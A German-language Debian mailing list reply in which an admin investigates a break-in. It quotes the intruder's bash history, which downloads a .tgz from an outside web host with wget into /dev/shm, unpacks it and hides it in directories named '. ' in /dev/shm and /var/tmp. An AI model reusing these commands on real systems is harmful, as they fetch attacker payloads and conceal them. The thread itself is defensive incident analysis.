Re: Veränderte Dateien finden

To: debian-user-german@lists.debian.org
Subject: Re: Veränderte Dateien finden
From: Jan Fricke <fricke@math.uni-siegen.de>
Date: Thu, 30 Nov 2006 16:17:27 +0100
Message-id: <[🔎] 456EF607.90803@math.uni-siegen.de>
In-reply-to: <7mSKq-2qL-23@gated-at.bofh.it>
References: <7mR1M-7lr-19@gated-at.bofh.it> <7mShf-1ws-17@gated-at.bofh.it> <7mShf-1ws-15@gated-at.bofh.it> <7mSKq-2qL-23@gated-at.bofh.it>

Frank Dietrich wrote:
> Hi Jan,
> 
> Jan Fricke <fricke@math.uni-siegen.de> wrote:
>> Das root-Passwort wurde geändert. Die Bash-History war anscheinend
>> nicht gelöscht, und sie enthält folgende letzte Einträge:
>>
>> uptime
>> uname -a
>> passwd
>> cd /dev/shm
>> wget www.freewebtown.com/aproape/cornelirina.tgz
>> tar zxvf cornelirina.tgz
>> cd '. '
> 
> Schon in '$mnt_altes_root/dev/shm/. ' nachgeschaut ob da noch was
> drin liegt?                        ^- das Leerzeichen ist wichtig 
> 
> 
>> cd /var/tmp
>> cd '. '
> 
> Und in '$mnt_altes_root/var/tmp/. ' ?
> 
> Frank

Ja, da liegt das, was auch auch im .tgz-File ist. Wahrscheinlich wurden
gar keine Binaries geändert, sondern nur irgendein zusätzlicher Service
installiert. (Spiele-Server? Chat-Server?)

Viele Grüße              Jan

Reply to:

Follow-Ups:
- Re: Veränderte Dateien finden
  - From: Ulf Volmer <u.volmer@u-v.de>

Prev by Date: Re: Apache2 erlaubt keinen Zugriff auf lokale Webseite
Next by Date: Re: [OT] DHCP-Server soll nur auf bestimmte MAC-Adressen reagieren
Previous by thread: Re: Tintenstrahldrucker 50-100 ___, CUPS aus Debian Etch
Next by thread: Re: Veränderte Dateien finden
Index(es):
- Date
- Thread